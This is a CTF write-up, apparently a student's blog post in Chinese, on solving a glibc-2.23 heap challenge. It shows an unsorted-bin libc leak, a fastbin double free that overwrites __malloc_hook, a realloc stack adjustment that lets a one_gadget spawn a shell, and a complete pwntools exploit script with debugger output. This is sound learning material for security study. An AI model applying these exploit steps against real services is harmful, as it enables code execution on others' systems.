当时这个题目是 0 解了的。这是我第一次做堆相关的题目,当时比赛的时候不给网络,也没有事先准备什么材料,所以比赛的时候一点思路也没有。比赛结束之后参考了一下网上的一些资料问了一下 Lotus ✌ 也算是复现出来了。
libc 版本问题解决
题目给的 libc 版本为 libc-2.23.so,调试发现直接运行根本不会使用这个版本的 libc ,知道可以 patch 解决,但是感觉胖爷应该有更好的方法,遂去问 Lotus ✌
废物小高:咋让程序用他附件里给的 libc 版本啊
废物小高:[不知所措.gif]
Lotus ✌ : patchelf
还是 patch 一下吧,从网上找了一篇相关的文章,跟着做了一下
主要就是下面两句
patchelf --set-interpreter /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so ./double_free
patchelf --replace-needed libc.so.6 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so ./double_free
|
再运行,发现已经用上 libc-2.23.so 了,解决。
pwndbg> libs LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA Start End Perm Size Offset File 0x555555400000 0x555555401000 r-xp 1000 0 /home/s1nk/CTF/pwn/free/double_free 0x555555601000 0x555555602000 r--p 1000 1000 /home/s1nk/CTF/pwn/free/double_free 0x555555602000 0x555555603000 rw-p 1000 2000 /home/s1nk/CTF/pwn/free/double_free 0x555555603000 0x555555609000 rw-p 6000 4000 /home/s1nk/CTF/pwn/free/double_free 0x7ffff7a0d000 0x7ffff7bcd000 r-xp 1c0000 0 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so 0x7ffff7bcd000 0x7ffff7dcd000 ---p 200000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so 0x7ffff7dcd000 0x7ffff7dd1000 r--p 4000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so 0x7ffff7dd1000 0x7ffff7dd3000 rw-p 2000 1c4000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so 0x7ffff7dd3000 0x7ffff7dd7000 rw-p 4000 0 [anon_7ffff7dd3] 0x7ffff7dd7000 0x7ffff7dfd000 r-xp 26000 0 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so 0x7ffff7ff3000 0x7ffff7ff6000 rw-p 3000 0 [anon_7ffff7ff3] 0x7ffff7ff6000 0x7ffff7ffa000 r--p 4000 0 [vvar] 0x7ffff7ffa000 0x7ffff7ffc000 r-xp 2000 0 [vdso] 0x7ffff7ffc000 0x7ffff7ffd000 r--p 1000 25000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so 0x7ffff7ffd000 0x7ffff7ffe000 rw-p 1000 26000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so 0x7ffff7ffe000 0x7ffff7fff000 rw-p 1000 0 [anon_7ffff7ffe] 0x7ffffffde000 0x7ffffffff000 rw-p 21000 0 [stack]
|
本部分主要参考:
1. 利用 patchelf 修改 pwn 题目的 libc
利用
题目的名字是 free ,附件的名字是 double_free,不难让人想到题目利用的主要漏洞是 double free。从网上找了一些相关的材料,结合自己逆向分析的结果,最初确定思路大概就是
- 利用unsorted bin 的特性泄露
libc 基地址
- 利用 double free 实现
UAF 然后控制 fd 指针到 __malloc_hook 最终实现修改 __malloc_hook 为 one_gadget
利用 unsorted bin 的特性泄露 libc基地址
unsorted bin 在管理时为循环双向链表,在该链表中必有一个节点(不准确的说,是尾节点,这个就意会一下把,毕竟循环链表实际上没有头尾)的 fd 指针会指向 main_arena 结构体内部。
可以通过 UAF 泄露 fd 指针,拿到一个与 main_arena 有固定偏移的地址,而main_arena 是 libc中的一个全局变量,它相对于libc基地址的偏移量是固定的可以通过调试得到,以获取libc基地址。
pwndbg> bins fastbins empty unsortedbin all: 0x555555609000 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x555555609000 smallbins empty largebins empty pwndbg> vmmap libc-2.23.so LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA Start End Perm Size Offset File 0x555555609000 0x55555562a000 rw-p 21000 0 [heap] ► 0x7ffff7a0d000 0x7ffff7bcd000 r-xp 1c0000 0 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so ► 0x7ffff7bcd000 0x7ffff7dcd000 ---p 200000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so ► 0x7ffff7bcd000 0x7ffff7dcd000 ---p 200000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so ► 0x7ffff7dcd000 0x7ffff7dd1000 r--p 4000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so ► 0x7ffff7dcd000 0x7ffff7dd1000 r--p 4000 1c0000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so ► 0x7ffff7dd1000 0x7ffff7dd3000 rw-p 2000 1c4000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so ► 0x7ffff7dd1000 0x7ffff7dd3000 rw-p 2000 1c4000 /home/s1nk/CTF/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so 0x7ffff7dd3000 0x7ffff7dd7000 rw-p 4000 0 [anon_7ffff7dd3]
|
所以,偏移量 offset = 0x7ffff7dd1b78 - 0x7ffff7a0d000 = 3951480
泄露过程如下:
alloc(0x100, b'1' * 0x100) alloc(1, b'1') delete(0) show(0)
r = sh.recvline(keepends=False).ljust(8, b'\x00') libc_addr = u64(r) - 3951480 print(hex(libc_addr))
|
完整代码见后文
double free
fastbin double free 是指 fastbin 的 chunk 可以被多次释放,因此可以在 fastbin 链表中存在多次,这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块,相当于多个指针指向同一个堆块。
所以,当我们执行如下操作后,chunk#2 就会在 fastbin 中出现两次
alloc(0x60, b'1') alloc(0x60, b'1')
delete(2) delete(3) delete(2)
|
pwndbg> fastbins fastbins 0x70: 0x5565b2328000 —▸ 0x5565b2328070 ◂— 0x5565b2328000
|
也就是上面的 0x5565b2328000,此时我们就可以通过 alloc(0x60, p64(evil_chunk)) # 4,设置 0x5565b2328000 地址这个 chunk 的 fd 为指定地址。
比如下图中,就是设置成了 0x7f9f2e9bbaed
pwndbg> fastbins fastbins 0x70: 0x5565b2328070 —▸ 0x5565b2328000 —▸ 0x7f9f2e9bbaed (_IO_wide_data_0+301) ◂— 0x9f2e67cea0000000
|
只要控制 fd 的值指向 __malloc_hook 地址的前面一点,就可以实现对 __malloc_hook 的控制
pwndbg> x/10gx &__malloc_hook 0x7f9f2e9bbb10 <__malloc_hook>: 0x0000000000000000 0x0000000000000000 0x7f9f2e9bbb20 <main_arena>: 0x0000000000000000 0x0000000000000000 0x7f9f2e9bbb30 <main_arena+16>: 0x0000000000000000 0x0000000000000000 0x7f9f2e9bbb40 <main_arena+32>: 0x0000000000000000 0x0000000000000000 0x7f9f2e9bbb50 <main_arena+48>: 0x00005565b2328070 0x0000000000000000 pwndbg> x/10gx ((long long)&__malloc_hook - 0x30) 0x7f9f2e9bbae0 <_IO_wide_data_0+288>: 0x0000000000000000 0x0000000000000000 0x7f9f2e9bbaf0 <_IO_wide_data_0+304>: 0x00007f9f2e9ba260 0x0000000000000000 0x7f9f2e9bbb00 <__memalign_hook>: 0x00007f9f2e67cea0 0x00007f9f2e67ca70 0x7f9f2e9bbb10 <__malloc_hook>: 0x0000000000000000 0x0000000000000000 0x7f9f2e9bbb20 <main_arena>: 0x0000000000000000 0x0000000000000000 pwndbg> x/64bx ((long long)&__malloc_hook - 0x30) 0x7f9f2e9bbae0 <_IO_wide_data_0+288>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7f9f2e9bbae8 <_IO_wide_data_0+296>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7f9f2e9bbaf0 <_IO_wide_data_0+304>: 0x60 0xa2 0x9b 0x2e 0x9f 0x7f 0x00 0x00 0x7f9f2e9bbaf8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7f9f2e9bbb00 <__memalign_hook>: 0xa0 0xce 0x67 0x2e 0x9f 0x7f 0x00 0x00 0x7f9f2e9bbb08 <__realloc_hook>: 0x70 0xca 0x67 0x2e 0x9f 0x7f 0x00 0x00 0x7f9f2e9bbb10 <__malloc_hook>: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7f9f2e9bbb18: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
|
为了满足chunk 的 size 字段,这里需要取 &__malloc_hook - 0x23
pwndbg> x/10gx ((long long)&__malloc_hook - 0x23) 0x7f9f2e9bbaed <_IO_wide_data_0+301>: 0x9f2e9ba260000000 `0x000000000000007f` 0x7f9f2e9bbafd: 0x9f2e67cea0000000 0x9f2e67ca7000007f 0x7f9f2e9bbb0d <__realloc_hook+5>: 0x000000000000007f 0x0000000000000000 0x7f9f2e9bbb1d: 0x0000000000000000 0x0000000000000000 0x7f9f2e9bbb2d <main_arena+13>: 0x0000000000000000 0x0000000000000000
|
此时,size 字段为 0x7f 刚好可以过这个检查
errstr = "malloc(): memory corruption (fast)";
|
使用工具查找 libc 中的 one_gadget
➜ free one_gadget libc-2.23.so 0x45226 execve("/bin/sh", rsp+0x30, environ) constraints: rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ) constraints: [rsp+0x30] == NULL
0xf0364 execve("/bin/sh", rsp+0x50, environ) constraints: [rsp+0x50] == NULL
0xf1207 execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL
|
所以利用方法为
alloc(0x100, b'1' * 0x100) alloc(1, b'1') delete(0) show(0)
r = sh.recvline(keepends=False).ljust(8, b'\x00') libc_addr = u64(r) - 3951480
__malloc_hook = libc.symbols['__malloc_hook'] + libc_addr ogg = 0x4527a + libc_addr
evil_chunk = __malloc_hook - 0x23
alloc(0x60, b'1') alloc(0x60, b'1')
delete(2) delete(3) delete(2)
alloc(0x60, p64(evil_chunk)) alloc(0x60, b'1') alloc(0x60, p64(evil_chunk)) alloc(0x60, b'a' * 0x10 + b'a' * 0x3 + p64(ogg))
|
此时,__malloc_hook指向 one_gadget,如果顺利的话,下次 malloc 就会触发 one_gadget 进而实现 get_shell。但是事与愿违,试了所有的 one_gadget 发现都不符合条件,害。
本部分主要参考:
1. pwn学习系列之double free
2. Unsorted Bin Attack - CTF Wiki
3. glibc里的one gadget
4. Fastbin Attack - CTF Wiki
利用 realloc 调整栈使one_gadget生效
一番搜索无果后,继续选择问 Lotus ✌,
废物小高:找到的one_gadget 都不行,这种情况咋搞
废物小高:[不知所措.gif]
Lotus ✌ : 用 realloc_hook 调一下,https://blog.csdn.net/Invin_cible/article/details/123042819?spm=1001.2014.3001.5501
文章看了一下,个人理解就是把 __malloc_hook 的值设置为 realloc + ofsset ,然后 malloc 的时候就会触发 realloc,并利用 offset 对 rsp 的值进行调整,再把 __realloc_hook的值设置为 one_gadget ,这样在 realloc 触发后就会继续触发 one_gadget。通过前面的查看可以得知,__realloc_hook 就在 __malloc_hook 前面紧挨着。看 一下 realloc 函数的内容,发现和 Lotus ✌ 博客里的一样
pwndbg> x/20i 140391966390032 0x7faf8d493710 <__GI___libc_realloc>: push r15 0x7faf8d493712 <__GI___libc_realloc+2>: push r14 0x7faf8d493714 <__GI___libc_realloc+4>: push r13 0x7faf8d493716 <__GI___libc_realloc+6>: push r12 0x7faf8d493718 <__GI___libc_realloc+8>: mov r12,rsi 0x7faf8d49371b <__GI___libc_realloc+11>: push rbp 0x7faf8d49371c <__GI___libc_realloc+12>: push rbx 0x7faf8d49371d <__GI___libc_realloc+13>: mov rbx,rdi 0x7faf8d493720 <__GI___libc_realloc+16>: sub rsp,0x38 0x7faf8d493724 <__GI___libc_realloc+20>: mov rax,QWORD PTR [rip+0x33f8a5]# 0x7faf8d7d2fd0 0x7faf8d49372b <__GI___libc_realloc+27>: mov rax,QWORD PTR [rax] 0x7faf8d49372e <__GI___libc_realloc+30>: test rax,rax 0x7faf8d493731 <__GI___libc_realloc+33>: jne 0x7faf8d493958 <__GI___libc_realloc+584> 0x7faf8d493737 <__GI___libc_realloc+39>: test rsi,rsi 0x7faf8d49373a <__GI___libc_realloc+42>: sete dl 0x7faf8d49373d <__GI___libc_realloc+45>: test rdi,rdi 0x7faf8d493740 <__GI___libc_realloc+48>: setne al 0x7faf8d493743 <__GI___libc_realloc+51>: and al,dl 0x7faf8d493745 <__GI___libc_realloc+53>: jne 0x7faf8d493a70 <__GI___libc_realloc+864> 0x7faf8d49374b <__GI___libc_realloc+59>: test rdi,rdi
|
那就一个个试一下,看看栈,发现当 offset 为 0xc 的时候,此时 [rsp + 30] == null 存在满足条件的 one_gadget
pwndbg> x/10gx $rsp 0x7fff9c8fa700: 0x00007faf8d49395f 0x00007faf8d48982b 0x7fff9c8fa710: 0x0000000000000004 0x00007faf8d7d4620 0x7fff9c8fa720: 0x000055c3e9e00da7 0x00007faf8d47e80a 0x7fff9c8fa730: 0x0000000000000000 0x0000000000000000 0x7fff9c8fa740: 0x0000000000000000 0x000055c3e9e00a6d
|
所以,完整脚本如下:
from pwn import *
sh = process('./double_free')
libc = ELF('./libc-2.23.so')
def alloc(size, content): sh.recvuntil(b'choice\n') sh.sendline(b'1') sh.recvuntil(b'size\n') sh.sendline(f'{size}'.encode('utf-8')) sh.recvuntil(b'content\n') sh.sendline(content)
def delete(id): sh.recvuntil(b'choice\n') sh.sendline(b'2') sh.recvuntil(b'idx\n') sh.sendline(f'{id}'.encode('utf-8'))
def show(id): sh.recvuntil(b'choice\n') sh.sendline(b'3') sh.recvuntil(b'idx\n') sh.sendline(f'{id}'.encode('utf-8'))
alloc(0x100, b'1' * 0x100) alloc(1, b'1') delete(0) show(0)
r = sh.recvline(keepends=False).ljust(8, b'\x00') libc_addr = u64(r) - 3951480
__malloc_hook = libc.symbols['__malloc_hook'] + libc_addr realloc = libc.symbols['realloc'] + libc_addr ogg = 0x4527a + libc_addr evil_chunk = __malloc_hook - 0x23
alloc(0x60, b'1') alloc(0x60, b'1')
delete(2) delete(3) delete(2)
alloc(0x60, p64(evil_chunk)) alloc(0x60, b'1') alloc(0x60, p64(evil_chunk)) alloc(0x60, b'a' * 0x8 + b'a' * 0x3 + p64(ogg) + p64(realloc + 0xc)) sh.recvuntil(b'choice\n') sh.sendline(b'1') sh.recvuntil(b'size\n') sh.sendline(f'{0x60}'.encode('utf-8')) sh.interactive()
|